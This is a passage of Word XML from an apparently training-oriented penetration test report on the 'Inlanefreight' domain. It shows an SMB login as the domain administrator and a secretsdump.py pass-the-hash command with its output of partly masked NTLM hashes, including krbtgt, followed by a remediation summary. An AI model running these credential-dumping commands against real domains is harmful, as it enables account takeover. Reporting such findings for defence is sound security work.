              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="05357DD5" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>SMB         192.168.195.204 445    DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E7605D4" w14:textId="397AC0ED" w:rsidR="006E291D" w:rsidRDefault="006E291D" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SMB         192.168.195.204 445    DC01             [+] INLANEFREIGHT.LOCAL\administrator e4axxxxxxxxxxxxxxxx1c88c2e94cba2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34FAAAA6" w14:textId="18217935" w:rsidR="006E291D" w:rsidRDefault="00973040" w:rsidP="00973040">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:color w:val="9FEF00"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Authenticating to Domain Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1945D4BE" w14:textId="6557EDDE" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="006E291D">
        <w:t xml:space="preserve">With this access it was possible to retrieve the NTLM password hashes for all users in the domain. The tester then performed offline cracking of these hashes using the Hashcat tool. A domain password analysis showing several metrics can be found in the </w:t>
      </w:r>
      <w:hyperlink w:anchor="_Appendices" w:history="1">
        <w:r w:rsidRPr="00C64082">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>appendices</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006E291D">
        <w:t xml:space="preserve"> of this report.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="006E291D" w14:paraId="7332929B" w14:textId="77777777" w:rsidTr="004539C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="541124B4" w14:textId="3548182B" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>secretsdump.py</w:t>
            </w:r>
            <w:r w:rsidR="00E81003">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>inlanefreight/administrator@192.168.195.204 -hashes ad3b435b51404eeaad3b435b51404ee:e4axxxxxxxxxxxxxxxx1c88c2e94cba2 -just-dc-ntlm</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30B9F7F1" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="69699743" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Impacket v0.9.24.dev1+20210922.102044.c7bc76f8 - Copyright 2021 SecureAuth Corporation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12DCE6D2" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3F8FB4F8" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="071E6E28" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[*] Using the DRSUAPI method to get NTDS.DIT secrets</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3574A2C3" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Administrator:500:aad3b435b51404eeaad3b435b51404ee:e4axxxxxxxxxxxxxxxx1c88c2e94cba2:::</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5694EF73" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cxxxxxxxxxx7e0c089c0:::</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AB2FC19" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4180f1f4xxxxxxxxxx0e8523771a8c:::</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F7E2572" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>mssqlsvc:1106:aad3b435b51404eeaad3b435b51404ee:55a6c7xxxxxxxxxxxx2b07e1:::</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="156F6281" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>srvadmin:1107:aad3b435b51404eeaad3b435b51404ee:9f9154fxxxxxxxxxxxxx0930c0:::</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D22AB67" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>pramirez:1108:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9xxxxxxxxxxxxxed5c58:::</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="661685A0" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2191D8B0" w14:textId="29D3FBD2" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;SNIP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B8BCC29" w14:textId="1C2DA135" w:rsidR="00973040" w:rsidRDefault="00973040">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Dumping Domain Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B507C36" w14:textId="77777777" w:rsidR="00CF7345" w:rsidRDefault="00881DF1">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="9FEF00"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A00E364" w14:textId="447064BB" w:rsidR="00390B73" w:rsidRDefault="00390B73" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Remediation_Summary"/>
      <w:bookmarkStart w:id="32" w:name="_Toc106718127"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Remediation Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="2BCF8915" w14:textId="26D531AD" w:rsidR="00390B73" w:rsidRDefault="00B7507B" w:rsidP="00390B73">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B7507B">
        <w:t>As a result of this assessment there are several opportunities</w:t>
      </w:r>
      <w:r w:rsidR="00C64082">
        <w:t xml:space="preserve"> for</w:t>
      </w:r>
      <w:r w:rsidRPr="00B7507B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D14781">
        <w:t>Inlanefreight</w:t>
      </w:r>
      <w:r w:rsidR="0035464E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B7507B">
        <w:t xml:space="preserve">to strengthen its internal network security. Remediation efforts are prioritized below starting with those that will likely take the least amount of time and effort to complete. </w:t>
      </w:r>
      <w:r w:rsidR="00D14781">
        <w:t>Inlanefreight</w:t>
      </w:r>
      <w:r w:rsidR="0035464E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B7507B">
        <w:t xml:space="preserve">should ensure that all remediation steps and mitigating controls are carefully planned and tested to prevent any service disruptions or loss of data. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7373764F" w14:textId="5BDF8839" w:rsidR="00390B73" w:rsidRPr="00B7507B" w:rsidRDefault="00390B73" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="HTBheading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc106718128"/>
      <w:bookmarkStart w:id="34" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidRPr="00CA74E4">
        <w:t>Short Term</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="337601D2" w14:textId="5746FFAF" w:rsidR="00393946" w:rsidRPr="00DE35E7" w:rsidRDefault="00393946" w:rsidP="00393946">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>Finding 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">] – Set strong (24+ character) passwords on all SPN accounts </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755435ED" w14:textId="5E834A1C" w:rsidR="009066B1" w:rsidRPr="00DE35E7" w:rsidRDefault="00393946" w:rsidP="009066B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>Finding 5</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">] – </w:t>
      </w:r>
      <w:r w:rsidR="00B7507B" w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>Change the</w:t>
      </w:r>
      <w:r w:rsidR="009066B1" w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> default admin credentials for the Tomcat Manager</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9BBAF5" w14:textId="4868EE7C" w:rsidR="009066B1" w:rsidRPr="00DE35E7" w:rsidRDefault="00393946" w:rsidP="00390B73">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding </w:t>
      </w:r>
      <w:r w:rsidR="00DE35E7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">] – </w:t>
      </w:r>
      <w:r w:rsidR="009066B1" w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable Directory Listing on the affected web server </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D849C4A" w14:textId="42DF8956" w:rsidR="00B7507B" w:rsidRPr="00DE35E7" w:rsidRDefault="00393946" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">Enforce a password change for all users </w:t>
      </w:r>
      <w:r w:rsidR="001C6D4A" w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>because of</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> the domain compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225CF31C" w14:textId="4E60AF04" w:rsidR="00390B73" w:rsidRDefault="00390B73" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="HTBheading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc106718129"/>
      <w:r w:rsidRPr="00CA74E4">
        <w:t>Medium Term</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="061B3BCA" w14:textId="3E53BEDF" w:rsidR="00393946" w:rsidRPr="00DE35E7" w:rsidRDefault="00393946" w:rsidP="00393946">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>Finding 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>] – Disable LLMNR and NBT-NS wherever possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B80704" w14:textId="6113ECB9" w:rsidR="00393946" w:rsidRPr="00DE35E7" w:rsidRDefault="00393946" w:rsidP="00393946">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>Finding 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">] – Transition from SPNs to Group Managed Service Accounts (gMSA) wherever possible </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F14964" w14:textId="02C5D6C8" w:rsidR="009066B1" w:rsidRPr="00DE35E7" w:rsidRDefault="00393946" w:rsidP="00393946">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>Finding 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">] – </w:t>
      </w:r>
      <w:r w:rsidR="009066B1" w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement a solution such as the Microsoft Local Administrator Password Solution" (LAPS) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131073FE" w14:textId="1DD638F5" w:rsidR="00B7507B" w:rsidRPr="00DE35E7" w:rsidRDefault="00393946" w:rsidP="00B7507B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>Finding 4</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">] – </w:t>
      </w:r>
      <w:r w:rsidR="00B7507B" w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">Enhance the </w:t>
      </w:r>
      <w:r w:rsidR="00B807BB" w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">domain </w:t>
      </w:r>
      <w:r w:rsidR="00B7507B" w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>password policy</w:t>
      </w:r>
      <w:r w:rsidR="00D71552" w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F81CDB" w14:textId="02DAC578" w:rsidR="00393946" w:rsidRPr="00DE35E7" w:rsidRDefault="00393946" w:rsidP="00B7507B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>Finding 4</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">] – </w:t>
      </w:r>
      <w:r w:rsidR="00B807BB" w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>Consider implementing an enterprise password manager</w:t>
      </w:r>
    </w:p>
